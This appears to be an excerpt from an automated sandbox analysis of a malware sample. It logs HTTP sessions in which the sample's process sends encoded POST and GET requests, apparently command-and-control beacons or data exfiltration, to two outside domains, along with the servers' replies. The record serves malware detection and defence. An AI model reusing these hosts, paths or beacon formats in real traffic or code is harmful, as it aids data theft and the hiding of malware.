                                                                                                                    17192.168.2.44985547.76.213.197803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:17.073219061 CET598OUTPOST /egqi/ HTTP/1.1
                                                                                                                    Host: www.ytsd88.top
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.ytsd88.top
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.ytsd88.top/egqi/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 57 35 66 78 66 53 66 32 68 6a 52 31 47 66 48 6b 47 51 2f 46 49 44 64 32 30 53 31 52 50 53 4a 76 4d 48 66 47 35 31 45 38 42 6d 36 4d 4b 79 56 50 42 5a 42 69 48 56 6c 58 37 52 6e 6f 4c 36 62 58 55 35 51 51 4c 77 56 46 33 46 4f 41 32 43 47 51 41 65 63 61 6b 74 64 33 35 4b 52 39 37 63 36 38 59 6c 5a 30 6c 7a 62 38 35 2b 59 71 6c 43 4b 58 39 35 68 63 74 2f 30 65 2f 6a 66 57 64 43 38 41 4a 32 79 37 31 2f 4e 34 67 51 53 44 39 76 52 5a 46 65 6b 78 71 42 74 55 56 77 72 62 32 46 4c 65 43 66 77 67 78 61 52 2b 2f 44 32 34 6f 34 47 6b 51 6c 6d 52 58 49 4a 54 75 50 64 42 72 53 71 4a 30 67 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=W5fxfSf2hjR1GfHkGQ/FIDd20S1RPSJvMHfG51E8Bm6MKyVPBZBiHVlX7RnoL6bXU5QQLwVF3FOA2CGQAecaktd35KR97c68YlZ0lzb85+YqlCKX95hct/0e/jfWdC8AJ2y71/N4gQSD9vRZFekxqBtUVwrb2FLeCfwgxaR+/D24o4GkQlmRXIJTuPdBrSqJ0g==
                                                                                                                    Nov 21, 2024 16:58:18.693969011 CET574INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:18 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 409
                                                                                                                    Connection: close
                                                                                                                    ETag: "66d016cf-199"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.44986147.76.213.197803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:19.747945070 CET618OUTPOST /egqi/ HTTP/1.1
                                                                                                                    Host: www.ytsd88.top
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.ytsd88.top
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.ytsd88.top/egqi/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 51 4b 4d 4b 54 6c 50 41 59 42 69 55 6c 6c 58 6a 42 6e 74 46 61 61 36 55 35 73 59 4c 78 70 46 33 42 65 41 32 44 32 51 41 74 30 64 6b 39 64 50 31 71 52 2f 6a 38 36 38 59 6c 5a 30 6c 7a 6e 57 35 2b 41 71 6c 7a 36 58 38 62 5a 66 6b 66 30 64 33 44 66 57 4c 43 38 4d 4a 32 79 6a 31 2b 42 57 67 53 71 44 39 72 64 5a 47 4d 4d 77 7a 78 74 57 52 77 72 50 79 30 7a 52 49 71 46 50 76 59 56 44 2f 6a 75 73 74 2b 4c 2b 42 55 48 47 46 49 74 67 7a 49 55 31 6d 52 58 41 76 6b 78 51 74 31 57 59 4c 6f 73 52 4c 74 51 78 50 38 51 77 4a 75 6b 3d
                                                                                                                    Data Ascii: GzeXFT7=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBQKMKTlPAYBiUllXjBntFaa6U5sYLxpF3BeA2D2QAt0dk9dP1qR/j868YlZ0lznW5+Aqlz6X8bZfkf0d3DfWLC8MJ2yj1+BWgSqD9rdZGMMwzxtWRwrPy0zRIqFPvYVD/just+L+BUHGFItgzIU1mRXAvkxQt1WYLosRLtQxP8QwJuk=
                                                                                                                    Nov 21, 2024 16:58:21.329917908 CET574INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:21 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 409
                                                                                                                    Connection: close
                                                                                                                    ETag: "66d016cf-199"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.44986747.76.213.197803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:22.414132118 CET10700OUTPOST /egqi/ HTTP/1.1
                                                                                                                    Host: www.ytsd88.top
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.ytsd88.top
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.ytsd88.top/egqi/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 54 71 4d 4b 46 35 50 42 37 5a 69 58 6c 6c 58 39 52 6e 73 46 61 62 34 55 39 34 69 4c 78 6c 56 33 48 43 41 32 6c 69 51 52 6f 41 64 71 39 64 50 39 4b 52 2b 37 63 36 54 59 6c 4a 4f 6c 79 4c 57 35 2b 41 71 6c 77 53 58 31 70 68 66 6f 2f 30 65 2f 6a 65 5a 64 43 39 52 4a 32 71 64 31 2b 46 6f 67 42 69 44 39 4c 4e 5a 57 76 6b 77 73 42 74 59 57 77 71 49 79 31 4f 52 49 73 68 70 76 5a 78 74 2f 68 79 73 74 61 76 67 52 56 7a 43 52 75 31 52 7a 62 6b 4e 6f 57 72 52 68 6c 6c 49 68 47 4f 73 63 49 6b 55 49 4d 78 54 57 2b 49 64 58 71 49 75 37 38 38 43 38 66 75 6c 34 62 59 49 38 58 72 6d 67 77 76 47 32 4f 69 78 43 77 52 2f 52 6f 42 4a 35 6b 39 72 64 68 62 65 76 31 75 55 71 78 7a 41 4b 4f 55 4d 77 31 50 46 47 53 54 68 52 51 42 46 7a 76 37 59 71 66 32 39 33 65 73 64 6d 48 73 68 63 4a 33 59 79 2f 78 44 6e 4f 6c 49 53 6b 6b 36 67 50 2f 35 53 69 48 48 45 41 53 78 4c 52 35 31 73 30 [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBTqMKF5PB7ZiXllX9RnsFab4U94iLxlV3HCA2liQRoAdq9dP9KR+7c6TYlJOlyLW5+AqlwSX1phfo/0e/jeZdC9RJ2qd1+FogBiD9LNZWvkwsBtYWwqIy1ORIshpvZxt/hystavgRVzCRu1RzbkNoWrRhllIhGOscIkUIMxTW+IdXqIu788C8ful4bYI8XrmgwvG2OixCwR/RoBJ5k9rdhbev1uUqxzAKOUMw1PFGSThRQBFzv7Yqf293esdmHshcJ3Yy/xDnOlISkk6gP/5SiHHEASxLR51s0jWlXq4Ui8zI3/cOceC7SKVassB7gsEvKQqiVIyjhEJlMGRw14x7ZG0zp9Vkg9Oz/lqpOuXhuPHisROlUSgUL7r9cKhv8pfDfsWVVaeuxiBSsC7GL2gw30CsEMV3HOXmpEwZ9MaV9ilIAYc5512OS0UMeNAsSIyxlbluUmZYJgnJW7NQrw7V5xIkVSkynN88HNJiR5M0YbyONZ69xR6aoLre3OZDLWFflBzEC7LwMHwkx3YmQgp8s8VVfKU+rc2hASDeOrTCAtPr3LTeoaI0LoLYUHe9jRUjxn2ZEcpyRJ8q0JrGlX/x/kp/vmaoL1o0GCjQFzVm5kPug0y2mi6wPeJnLdqvdtNU3YItDz8QmbD5T0z4GQlqk88kbfWS5eg8VvEZNht9hj07ERNrGqGE2O0dJos7PxvmRlSP1xQmAhhq4hXYnhf1CPMi/2XcPz7mJzDlimKpYc8NulMjRivt8xQy6ECjNkCVf60Ms2Xh+8up63MIZ83HD/lJ2b6xx9OeQpeJPEjpGGJ3XdZcZC5WoprudsqRG2cn8Rh7x7DWjrGFA92vaZ9lrfButLy6UVdKiDhrTeLqsDE9sIPYa8pzhvn6YK0JOZbP1P3BOi5otXOiU/Go74/jMkRgvwNt887TzqDf6G6jBU3KtX8A1Vo2KR2RaBMJYpacHwH [TRUNCATED]
                                                                                                                    Nov 21, 2024 16:58:24.045552969 CET574INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:23 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 409
                                                                                                                    Connection: close
                                                                                                                    ETag: "66d016cf-199"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.44987347.76.213.197803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:25.080581903 CET344OUTGET /egqi/?GzeXFT7=b73RclDzsQx9LNfKXEn0LSRo1QZueGUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8iuZq94lDlsrAFGhvrGfR3NsOl2e42KNKrIU=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1
                                                                                                                    Host: www.ytsd88.top
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:58:26.659496069 CET574INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:26 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 409
                                                                                                                    Connection: close
                                                                                                                    ETag: "66d016cf-199"
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.449889208.91.197.27803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:31.945622921 CET628OUTPOST /hyyd/ HTTP/1.1
                                                                                                                    Host: www.matteicapital.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.matteicapital.online
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.matteicapital.online/hyyd/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 56 55 49 64 6e 47 68 68 34 68 66 4f 56 51 50 49 48 71 63 6c 33 61 33 56 6b 70 30 30 44 47 32 66 6f 49 4b 50 58 54 4b 6f 72 66 72 6c 78 57 64 46 57 4e 4e 77 4f 56 50 73 6d 79 33 2b 51 6f 4c 51 2f 44 34 6c 31 58 69 37 35 69 6a 55 61 79 57 75 47 57 58 5a 4a 69 6a 41 34 36 54 43 50 68 6f 37 41 69 36 36 73 48 30 58 49 36 4b 78 49 35 38 63 52 2b 4f 47 65 69 78 34 78 71 64 58 55 2f 4c 2f 4c 5a 32 49 73 59 62 43 50 39 31 50 68 54 54 39 66 48 79 38 6d 57 4f 6b 57 4a 71 58 4c 38 72 79 48 31 45 34 6d 38 55 72 57 38 4c 6c 75 37 33 79 41 32 70 42 6d 77 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=SoNrVhZITNTyVUIdnGhh4hfOVQPIHqcl3a3Vkp00DG2foIKPXTKorfrlxWdFWNNwOVPsmy3+QoLQ/D4l1Xi75ijUayWuGWXZJijA46TCPho7Ai66sH0XI6KxI58cR+OGeix4xqdXU/L/LZ2IsYbCP91PhTT9fHy8mWOkWJqXL8ryH1E4m8UrW8Llu73yA2pBmw==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.449895208.91.197.27803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:34.619452953 CET648OUTPOST /hyyd/ HTTP/1.1
                                                                                                                    Host: www.matteicapital.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.matteicapital.online
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.matteicapital.online/hyyd/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 43 66 70 70 36 50 47 68 79 6f 6f 66 72 6c 36 32 64 45 59 74 4e 6e 4f 56 53 66 6d 7a 4c 2b 51 73 6a 51 2f 47 63 6c 31 6b 36 34 35 79 6a 57 4f 43 57 57 49 32 58 5a 4a 69 6a 41 34 35 75 58 50 68 77 37 42 53 4b 36 2b 57 31 6c 54 61 4b 79 50 35 38 63 47 75 4f 4b 65 69 77 76 78 70 59 79 55 35 50 2f 4c 5a 47 49 73 4a 62 42 47 39 31 46 2b 44 54 74 57 69 72 71 6b 30 54 43 64 5a 47 6b 4f 50 6e 73 43 7a 4a 69 33 4e 31 38 45 38 76 57 7a 38 2b 47 4e 31 55 49 39 32 78 61 72 4a 58 65 31 49 4d 45 4e 64 70 41 6d 39 4b 77 39 32 30 3d
                                                                                                                    Data Ascii: GzeXFT7=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD0Cfpp6PGhyoofrl62dEYtNnOVSfmzL+QsjQ/Gcl1k645yjWOCWWI2XZJijA45uXPhw7BSK6+W1lTaKyP58cGuOKeiwvxpYyU5P/LZGIsJbBG91F+DTtWirqk0TCdZGkOPnsCzJi3N18E8vWz8+GN1UI92xarJXe1IMENdpAm9Kw920=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.449901208.91.197.27803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:37.702493906 CET10730OUTPOST /hyyd/ HTTP/1.1
                                                                                                                    Host: www.matteicapital.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.matteicapital.online
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.matteicapital.online/hyyd/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 36 66 70 66 6d 50 58 32 6d 6f 70 66 72 6c 33 57 64 4a 59 74 4d 6c 4f 56 4b 54 6d 7a 47 4a 51 75 62 51 2b 67 51 6c 69 6c 36 34 33 79 6a 57 4d 43 57 74 47 57 57 45 4a 69 7a 45 34 35 2b 58 50 68 77 37 42 55 6d 36 39 48 31 6c 55 71 4b 78 49 35 38 49 52 2b 4f 6d 65 69 70 61 78 6f 74 48 55 4b 48 2f 4c 35 57 49 76 2f 48 42 48 64 31 44 2f 44 53 79 57 69 75 30 6b 30 66 5a 64 5a 44 73 4f 49 76 73 50 33 6f 70 74 70 73 71 58 65 7a 4c 77 73 47 58 57 56 78 52 35 55 31 45 37 59 7a 51 72 6f 55 34 49 61 4d 6c 34 6f 4f 64 6f 78 63 54 5a 51 79 4c 74 49 6b 48 43 66 45 5a 35 4c 78 4d 74 6c 44 78 69 36 48 58 37 4a 5a 54 6f 4d 65 63 52 67 6c 5a 72 5a 42 6f 67 73 64 77 66 37 6b 59 67 6a 4a 77 34 43 33 6f 76 4b 73 6a 30 66 55 59 6c 78 74 6a 6d 52 70 50 71 77 33 39 6f 57 73 31 2f 31 32 72 55 4a 48 41 74 53 77 42 4c 54 4a 58 30 61 51 62 59 71 6f 35 35 37 48 37 39 4d 75 4b 68 70 [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD06fpfmPX2mopfrl3WdJYtMlOVKTmzGJQubQ+gQlil643yjWMCWtGWWEJizE45+XPhw7BUm69H1lUqKxI58IR+OmeipaxotHUKH/L5WIv/HBHd1D/DSyWiu0k0fZdZDsOIvsP3optpsqXezLwsGXWVxR5U1E7YzQroU4IaMl4oOdoxcTZQyLtIkHCfEZ5LxMtlDxi6HX7JZToMecRglZrZBogsdwf7kYgjJw4C3ovKsj0fUYlxtjmRpPqw39oWs1/12rUJHAtSwBLTJX0aQbYqo557H79MuKhpAThzawVcNx4mngY3Y91Jf7v9Mx9Sa47SJpS54MZuCgUBOn6vQz5GudvKG1CYk0cB3tk1RZmHTcUNAePl6p5zYyk954dGcV8ZmRdvf/FGv1q6K8eqRfrq24BvLy/UOz5TALfqaNQopmvftxGl0ObJZw8a59dmh3BtmxGRE3RR0jXOWo6whjgfjcuGdWdAe3mlxtUyMaGZGLh0YIwBxyM3gg5S7CFqTan7gshLn9plAglAM9Fl2PihQ7o+3EFLnNkdkVRGWpb/yIwEJTQgLJjXZ13F/PBNhiA0shdQHeQTw8HnUQiurYtz8oq7xYEOVT3hOrZ5sEusix2lh2f0r98+nuA8fqn576O4OICmNFW8Bsgrs9dbxYvplWS/quxA4kd96HVrsuQ7IXtzqAwS0PVV7jT7p9Ym1lpqEnztC9YNQIV7iLNkrMHYOP5LTJRUUn9t4A98gNrdGcUXpuPuMd3mjBkbfMyLF7RZTZDGjF7iMiTSq1z//fC0gmj+EAH9kdgRSEG7Hc2WxS5YmMtW9J1xIEufzO9XLfDqtFJlkmrQ3ND4YsFC+AqRAzZZzwF95CPSc7hzkoRLAUvLbe1jrIkblZ+515fglNXw75lHl2awkSk7l0IgKx35ha4GqWRJLt1vCFaBCN/+uWR2+q2tl+gIYzrHGYN+1EaMjS [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.449911208.91.197.27803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:40.372714043 CET354OUTGET /hyyd/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=fqlLWWUWU+rKW3Ee0UVO0B/wSDzUS5U2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXwTX1CxmsRTufMD7rgZabFSEYAFPL6HYYC58= HTTP/1.1
                                                                                                                    Host: www.matteicapital.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
